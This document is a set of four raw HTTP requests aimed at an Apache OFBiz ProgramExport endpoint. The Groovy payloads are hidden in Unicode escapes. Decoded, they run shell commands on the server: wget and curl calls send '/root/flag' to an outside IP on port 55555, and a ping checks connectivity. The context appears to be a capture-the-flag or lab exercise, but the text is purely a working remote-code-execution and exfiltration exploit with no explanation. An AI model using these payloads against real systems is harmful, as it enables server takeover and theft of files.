POST /webtools/control/TestService/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: demo-trunk.ofbiz.apache.org
Content-Length: 554

groovyProgram=\u0074\u0068\u0072\u006F\u0077\u0020\u006E\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006F\u006E\u0028\u0027\u0077\u0067\u0065\u0074\u0020\u002D\u002D\u0070\u006F\u0073\u0074\u002D\u0066\u0069\u006C\u0065\u0020\u002F\u0072\u006F\u006F\u0074\u002F\u0066\u006C\u0061\u0067\u0020\u0031\u0037\u0032\u002E\u0031\u0036\u002E\u0032\u0034\u0030\u002E\u0031\u0033\u0032\u003A\u0035\u0035\u0035\u0035\u0035\u0020\u002D\u0071\u0027\u002E\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002E\u0074\u0065\u0078\u0074\u0029\u003B



POST /webtools/control/TestService/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: demo-trunk.ofbiz.apache.org
Content-Length: 332

groovyProgram=\u0074\u0068\u0072\u006F\u0077\u0020\u006E\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006F\u006E\u0028\u0027\u0070\u0069\u006E\u0067\u0020\u0067\u006F\u006F\u0067\u006C\u0065\u002E\u0061\u0074\u0027\u002E\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002E\u0074\u0065\u0078\u0074\u0029\u003B


POST /webtools/control/TestService/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: demo-trunk.ofbiz.apache.org
Content-Length: 614

groovyProgram=\u0074\u0068\u0072\u006F\u0077\u0020\u006E\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006F\u006E\u0028\u0027\u0063\u0075\u0072\u006C\u0020\u0031\u0037\u0032\u002E\u0031\u0036\u002E\u0032\u0034\u0030\u002E\u0031\u0033\u0032\u003A\u0035\u0035\u0035\u0035\u0035\u002F\u0024\u0028\u0063\u0061\u0074\u0020\u002F\u0072\u006F\u006F\u0074\u002F\u0066\u006C\u0061\u0067\u0029\u0020\u007C\u007C\u0020\u0070\u0069\u006E\u0067\u0020\u0067\u006F\u006F\u0067\u006C\u0065\u002E\u0061\u0074\u0027\u002E\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002E\u0074\u0065\u0078\u0074\u0029\u003B


POST /webtools/control/TestService/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: demo-trunk.ofbiz.apache.org
Content-Length: 614

groovyProgram=\u0074\u0068\u0072\u006F\u0077\u0020\u006E\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006F\u006E\u0028\u0027\u0077\u0067\u0065\u0074\u0020\u002D\u002D\u0070\u006F\u0073\u0074\u002D\u0066\u0069\u006C\u0065\u0020\u002F\u0072\u006F\u006F\u0074\u002F\u0066\u006C\u0061\u0067\u0020\u0031\u0037\u0032\u002E\u0031\u0036\u002E\u0032\u0034\u0030\u002E\u0031\u0033\u0032\u003A\u0035\u0035\u0035\u0035\u0035\u0020\u002D\u0071\u0020\u002D\u0054\u0020\u0039\u0039\u0039\u0039\u0039\u0039\u0027\u002E\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002E\u0074\u0065\u0078\u0074\u0029\u003B